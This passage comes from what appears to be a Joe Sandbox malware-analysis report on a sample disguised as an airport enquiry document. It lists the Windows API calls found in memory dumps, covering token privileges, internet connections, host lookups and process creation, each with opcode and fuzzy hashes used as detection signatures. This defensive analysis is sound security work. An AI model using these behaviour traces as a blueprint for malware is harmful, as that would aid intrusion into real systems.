            • Instruction ID: ead35155669d440d130cb63006ac878c5be6f0b25d90b36b01d1e7ddd2d4f466
            • Opcode Fuzzy Hash: ed5a6a5b36b751d3efd48495625204759c756c6085af6bdda838ac01052031be
            • Instruction Fuzzy Hash: DA113A319046057FCB08B7B5AC439BE7B68DF87328F24011AF208972D2DFA15D46A7A6
            APIs
               • Part of subcall function 00CD8652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),?,00000000,?), ref: 00CD8669
               • Part of subcall function 00CD8652: GetLastError.KERNEL32(?,TokenPrivileges,?,00000000,?), ref: 00CD8673
               • Part of subcall function 00CD8652: GetProcessHeap.KERNEL32(00000008,?,?,TokenPrivileges,?,00000000,?), ref: 00CD8682
               • Part of subcall function 00CD8652: HeapAlloc.KERNEL32(00000000,?,TokenPrivileges,?,00000000,?), ref: 00CD8689
               • Part of subcall function 00CD8652: GetTokenInformation.ADVAPI32(?,00000003(TokenPrivileges),00000000,?,?,?,TokenPrivileges,?,00000000,?), ref: 00CD869F
            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00CD8BEB
            • _memcmp.LIBCMT ref: 00CD8C0E
            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00CD8C44
            • HeapFree.KERNEL32(00000000), ref: 00CD8C4B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
            • String ID:
            • API String ID: 1592001646-0
            • Opcode ID: 4173fbb318c7ae3d925c1420b353854b30a45502fed0b0e64190355361cc65d1
            • Instruction ID: af31b789d878f01c19d6bbea857c98070af084c4d7fb1c57c6f8024a331b976e
            • Opcode Fuzzy Hash: 4173fbb318c7ae3d925c1420b353854b30a45502fed0b0e64190355361cc65d1
            • Instruction Fuzzy Hash: AA217F71E11209EFDB10DF94C945BEEB7B8FF84354F14409AE664A7340EB31AA0ADB60
            APIs
            • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00CF1A97
              • Part of subcall function 00CF1B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00CF1B40
              • Part of subcall function 00CF1B21: InternetCloseHandle.WININET(00000000), ref: 00CF1BDD
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
             • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
             • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Internet$CloseConnectHandleOpen
            • String ID:
            • API String ID: 1463438336-0
            • Opcode ID: bed6b3c608d844c04a2b2c74f90ea88765f55ad82ba6ceb1f84a8ed508213ff8
            • Instruction ID: ac37349716c68f8f9c5678fd534490feb1f638ecbe8b839d58ef15e8629a5030
            • Opcode Fuzzy Hash: bed6b3c608d844c04a2b2c74f90ea88765f55ad82ba6ceb1f84a8ed508213ff8
            • Instruction Fuzzy Hash: 5F21CF71200608FFDB629F60CC00FBAB7A9FF84711F18001AFF55D6650EB719911ABA6
            APIs
              • Part of subcall function 00CDF5AD: lstrlenW.KERNEL32(?,00000002,?,?,000000EF,?,00CDE1C4,?,?,?,00CDEFB7,00000000,000000EF,00000119,?,?), ref: 00CDF5BC
              • Part of subcall function 00CDF5AD: lstrcpyW.KERNEL32(00000000,?), ref: 00CDF5E2
              • Part of subcall function 00CDF5AD: lstrcmpiW.KERNEL32(00000000,?,00CDE1C4,?,?,?,00CDEFB7,00000000,000000EF,00000119,?,?), ref: 00CDF613
            • lstrlenW.KERNEL32(?,00000002,?,?,?,?,00CDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00CDE1DD
            • lstrcpyW.KERNEL32(00000000,?), ref: 00CDE203
            • lstrcmpiW.KERNEL32(00000002,cdecl,?,00CDEFB7,00000000,000000EF,00000119,?,?,00000000), ref: 00CDE237
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: lstrcmpilstrcpylstrlen
            • String ID: cdecl
            • API String ID: 4031866154-3896280584
            • Opcode ID: 7ab7cf451f794c5a628a966ebaa651c4267a6a6db430b848feb4d977bd649a4c
            • Instruction ID: 03f7ebd4a303f759d918aa95dae143ddbbcaf9ed36c072ac50b265f88634faf6
            • Opcode Fuzzy Hash: 7ab7cf451f794c5a628a966ebaa651c4267a6a6db430b848feb4d977bd649a4c
            • Instruction Fuzzy Hash: 72118E36200345EFCB25AF64DC45A7A77B8FF85350B50402BF91ACB360EB71A951D7A1
            APIs
            • _free.LIBCMT ref: 00CB5351
              • Part of subcall function 00CA594C: __FF_MSGBANNER.LIBCMT ref: 00CA5963
              • Part of subcall function 00CA594C: __NMSG_WRITE.LIBCMT ref: 00CA596A
              • Part of subcall function 00CA594C: RtlAllocateHeap.NTDLL(01640000,00000000,00000001,00000000,?,?,?,00CA1013,?), ref: 00CA598F
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: AllocateHeap_free
            • String ID:
            • API String ID: 614378929-0
            • Opcode ID: 6bc1a4353455d4e4b6516aba86342832464f2ec167186a1529657c80bc005443
            • Instruction ID: 8b96af26d4186743039eecb431a4797c1acd99b8d6b1367d782b42a42c708687
            • Opcode Fuzzy Hash: 6bc1a4353455d4e4b6516aba86342832464f2ec167186a1529657c80bc005443
            • Instruction Fuzzy Hash: 4E11C432904B17AFCB312F74AC4579D37D49F163B4F200429F9149A3A1DBB58A40A750
            APIs
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00CE7B20,?,?,00000000), ref: 00C85B8C
              • Part of subcall function 00C85B75: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00CE7B20,?,?,00000000,?,?), ref: 00C85BB0
            • gethostbyname.WSOCK32(?,?,?), ref: 00CF66AC
            • WSAGetLastError.WSOCK32(00000000), ref: 00CF66B7
            • _memmove.LIBCMT ref: 00CF66E4
            • inet_ntoa.WSOCK32(?), ref: 00CF66EF
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
            • String ID:
            • API String ID: 1504782959-0
            • Opcode ID: 23d38de2f75f4b9a1f5db656f6b239f319ef3696ea8ae2186a7a00701d757c1a
            • Instruction ID: 8c6e52ae412c931d43f313a2a24a89ce1a136293a394248a4bf881184ff16e2f
            • Opcode Fuzzy Hash: 23d38de2f75f4b9a1f5db656f6b239f319ef3696ea8ae2186a7a00701d757c1a
            • Instruction Fuzzy Hash: 23112E75500509AFCB04FBA4DD86DFEB7B8EF18314B144065F606A72A1DF70AE04EB65
            APIs
            • SendMessageW.USER32(?,000000B0,?,?), ref: 00CD9043
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD9055
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD906B
            • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00CD9086
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 27b251139f180c24a5c7184a6b3ef2842a8ae359b9efd25c8bad3034f5ce34c1
            • Instruction ID: a217fad4e567be18b6cac59ca3d075eb3416e258489f334afe977f2e326e1cea
            • Opcode Fuzzy Hash: 27b251139f180c24a5c7184a6b3ef2842a8ae359b9efd25c8bad3034f5ce34c1
            • Instruction Fuzzy Hash: 81114C79900218FFDB10DFA5C884E9DFB74FB48310F204096EA04B7250D6726E11DB90
            APIs
              • Part of subcall function 00C82612: GetWindowLongW.USER32(?,000000EB), ref: 00C82623
            • DefDlgProcW.USER32(?,00000020,?), ref: 00C812D8
            • GetClientRect.USER32(?,?), ref: 00CBB84B
            • GetCursorPos.USER32(?), ref: 00CBB855
            • ScreenToClient.USER32(?,?), ref: 00CBB860
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Client$CursorLongProcRectScreenWindow
            • String ID:
            • API String ID: 4127811313-0
            • Opcode ID: 47a2e48662e05eda68a126552b572fdbc988575004dfe5b9e6f5c254c6344c7d
            • Instruction ID: 4774c355122c4d4cbbf922884808714a8b250cd824928ef92e724b4bfa084aa5
            • Opcode Fuzzy Hash: 47a2e48662e05eda68a126552b572fdbc988575004dfe5b9e6f5c254c6344c7d
            • Instruction Fuzzy Hash: 80113635A00119AFCB10EFA8D889AEE77FCEB05315F500456F911E7251D730BA529BB9
            APIs
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CE01FD,?,00CE1250,?,00008000), ref: 00CE166F
            • Sleep.KERNEL32(00000000,?,?,?,?,?,?,00CE01FD,?,00CE1250,?,00008000), ref: 00CE1694
            • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00CE01FD,?,00CE1250,?,00008000), ref: 00CE169E
            • Sleep.KERNEL32(?,?,?,?,?,?,?,00CE01FD,?,00CE1250,?,00008000), ref: 00CE16D1
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CounterPerformanceQuerySleep
            • String ID:
            • API String ID: 2875609808-0
            • Opcode ID: 711219a44ed2b93bd86f9c5b682402b6b0b44e4ce5ca77f721fa2f4eabefe55e
            • Instruction ID: b5e6a800d01e386cb5d650f24e0c38d9f0b07f70e1da0d8e4dc9b1fddcd39b0e
            • Opcode Fuzzy Hash: 711219a44ed2b93bd86f9c5b682402b6b0b44e4ce5ca77f721fa2f4eabefe55e
            • Instruction Fuzzy Hash: 31115A31C1061DD7CF00AFA6D849AEEBB78FF09751F184059ED44F6240CB3056A08BE6
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
            • String ID:
            • API String ID: 3016257755-0
            • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
            • Instruction ID: 9804fb4675bb78dc91d3c2f6905d27530280a89442e86bb85d2b85dac5ded811
            • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
            • Instruction Fuzzy Hash: A3014E3644414AFBCF125F84CC018EE3F62BFA9351F598615FE2868031D236CAB1BB82
            APIs
            • GetWindowRect.USER32(?,?), ref: 00D0B59E
            • ScreenToClient.USER32(?,?), ref: 00D0B5B6
            • ScreenToClient.USER32(?,?), ref: 00D0B5DA
            • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00D0B5F5
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: ClientRectScreen$InvalidateWindow
            • String ID:
            • API String ID: 357397906-0
            • Opcode ID: 10828d7101d1d9222d94c6a9a74cd31351fd0d6c6f925aeb9d0a180a80c03785
            • Instruction ID: b94eda0f16cf56e30c3be6f73bab20f14898bf27d963d243743080351ae913e2
            • Opcode Fuzzy Hash: 10828d7101d1d9222d94c6a9a74cd31351fd0d6c6f925aeb9d0a180a80c03785
            • Instruction Fuzzy Hash: 041146B5D04209EFDB51CF99C844AEEFBB9FB08310F504166E954E3620D735AA558F60
            APIs
            • _memset.LIBCMT ref: 00D0B8FE
            • _memset.LIBCMT ref: 00D0B90D
            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00D47F20,00D47F64), ref: 00D0B93C
            • CloseHandle.KERNEL32 ref: 00D0B94E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: _memset$CloseCreateHandleProcess
            • String ID:
            • API String ID: 3277943733-0
            • Opcode ID: e907a7fb4528c0f12e57fb6c814dddaf284545ba1084cac688a5bb3a0bfa5dfe
            • Instruction ID: 5f3b47e2f34d0563ff5d74784894acab85217615cc4acc5852e0f81f509e97ec
            • Opcode Fuzzy Hash: e907a7fb4528c0f12e57fb6c814dddaf284545ba1084cac688a5bb3a0bfa5dfe
            • Instruction Fuzzy Hash: 85F082B66483007BF2102B61AC05FBB7A5CEF0A758F040421FF08D6392E7725D0487B8
            APIs
            • EnterCriticalSection.KERNEL32(?), ref: 00CE6E88
              • Part of subcall function 00CE794E: _memset.LIBCMT ref: 00CE7983
            • _memmove.LIBCMT ref: 00CE6EAB
            • _memset.LIBCMT ref: 00CE6EB8
            • LeaveCriticalSection.KERNEL32(?), ref: 00CE6EC8
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CriticalSection_memset$EnterLeave_memmove
            • String ID:
            • API String ID: 48991266-0
            • Opcode ID: 2e509b07cc767b201b6bcf13e4753b604de75cc5153f55206bc3d1726a5032d1
            • Instruction ID: ceac9f43d7f364d2417686ed5749cca85ef8d0f9bd00372e2de8d14452544e88
            • Opcode Fuzzy Hash: 2e509b07cc767b201b6bcf13e4753b604de75cc5153f55206bc3d1726a5032d1
            • Instruction Fuzzy Hash: 77F0543A100200ABCF116F55DC85B49BB29EF45320F148065FE0C9E217C731E911DBB4
            APIs
              • Part of subcall function 00C812F3: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00C8134D
              • Part of subcall function 00C812F3: SelectObject.GDI32(?,00000000), ref: 00C8135C
              • Part of subcall function 00C812F3: BeginPath.GDI32(?), ref: 00C81373
              • Part of subcall function 00C812F3: SelectObject.GDI32(?,00000000), ref: 00C8139C
            • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 00D0C030
            • LineTo.GDI32(00000000,?,?), ref: 00D0C03D
            • EndPath.GDI32(00000000), ref: 00D0C04D
            • StrokePath.GDI32(00000000), ref: 00D0C05B
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
            • String ID:
            • API String ID: 1539411459-0
            • Opcode ID: 2d6b07edcd937227bdbcedb066a637532c8ee902191fb004fff3b3b0b1d01fbf
            • Instruction ID: 3414298b457458be31a7e7169c5755913e02ab59301f3325bb7c81cfd48b56d8
            • Opcode Fuzzy Hash: 2d6b07edcd937227bdbcedb066a637532c8ee902191fb004fff3b3b0b1d01fbf
            • Instruction Fuzzy Hash: 93F0BE31000319BBDB226F50AC0AFCE3F99AF06310F188100FA19A16E287B54561DBF6
            APIs
            • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00CDA399
            • GetWindowThreadProcessId.USER32(?,00000000), ref: 00CDA3AC
            • GetCurrentThreadId.KERNEL32 ref: 00CDA3B3
            • AttachThreadInput.USER32(00000000), ref: 00CDA3BA
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
            • String ID:
            • API String ID: 2710830443-0
            • Opcode ID: ac24cf812a14a8e77f20d95aeca5a5cc06c7d8133b982801d1373ac72952584c
            • Instruction ID: 23655bd7a24294546200ed4a3e696df0004783f2b3111989c8cbdba898c99454
            • Opcode Fuzzy Hash: ac24cf812a14a8e77f20d95aeca5a5cc06c7d8133b982801d1373ac72952584c
            • Instruction Fuzzy Hash: 66E01531141328BADB205BA2DC0CFD73E1CEF167A1F508025B608C4560CA72C5408BB1
            APIs
            • GetSysColor.USER32(00000008), ref: 00C82231
            • SetTextColor.GDI32(?,000000FF), ref: 00C8223B
            • SetBkMode.GDI32(?,00000001), ref: 00C82250
            • GetStockObject.GDI32(00000005), ref: 00C82258
            • GetWindowDC.USER32(?,00000000), ref: 00CBC0D3
            • GetPixel.GDI32(00000000,00000000,00000000), ref: 00CBC0E0
            • GetPixel.GDI32(00000000,?,00000000), ref: 00CBC0F9
            • GetPixel.GDI32(00000000,00000000,?), ref: 00CBC112
            • GetPixel.GDI32(00000000,?,?), ref: 00CBC132
            • ReleaseDC.USER32(?,00000000), ref: 00CBC13D
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
            • String ID:
            • API String ID: 1946975507-0
            • Opcode ID: d4168a6444925f71077a518ef43015d4837095ade83a2f199b6caa6da1f4cf68
            • Instruction ID: 5141920c9387789b72e90731412de7a5491cf587d8dad7c492976fcbd538a9ca
            • Opcode Fuzzy Hash: d4168a6444925f71077a518ef43015d4837095ade83a2f199b6caa6da1f4cf68
            • Instruction Fuzzy Hash: 05E03932100344EADB215F68FC4D7D83B10EB05336F208366FA7D981E187714A90DB22
            APIs
            • GetCurrentThread.KERNEL32 ref: 00CD8C63
            • OpenThreadToken.ADVAPI32(00000000,?,?,?,00CD882E), ref: 00CD8C6A
            • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00CD882E), ref: 00CD8C77
            • OpenProcessToken.ADVAPI32(00000000,?,?,?,00CD882E), ref: 00CD8C7E
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_c80000_New Al Maktoum International Airport Enquiry Ref #2401249.jbxd
            Similarity
            • API ID: CurrentOpenProcessThreadToken
            • String ID:
            • API String ID: 3974789173-0
            • Opcode ID: f3ff0e9d248c0e40ed3fe8747d382ab6ff4667c8868875800443a219e68900c9
            • Instruction ID: 41a3c1386f96d52d812c1bdeac346d10700723f20f5974d605edb7d407375a87
            • Opcode Fuzzy Hash: f3ff0e9d248c0e40ed3fe8747d382ab6ff4667c8868875800443a219e68900c9
            • Instruction Fuzzy Hash: 4CE08636642311DBD7309FB06D0CB567BBCEF50792F244828F249C9140DA348445CB71
            APIs
            • GetDesktopWindow.USER32 ref: 00CC2187
            • GetDC.USER32(00000000), ref: 00CC2191
            • GetDeviceCaps.GDI32(00000000,0000000C), ref: 00CC21B1
            • ReleaseDC.USER32(?), ref: 00CC21D2
            Memory Dump Source
            • Source File: 00000000.00000002.1687606854.0000000000C81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C80000, based on PE: true
            • Associated: 00000000.00000002.1687554635.0000000000C80000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D0F000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687727691.0000000000D35000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687791917.0000000000D3F000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1687806940.0000000000D48000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
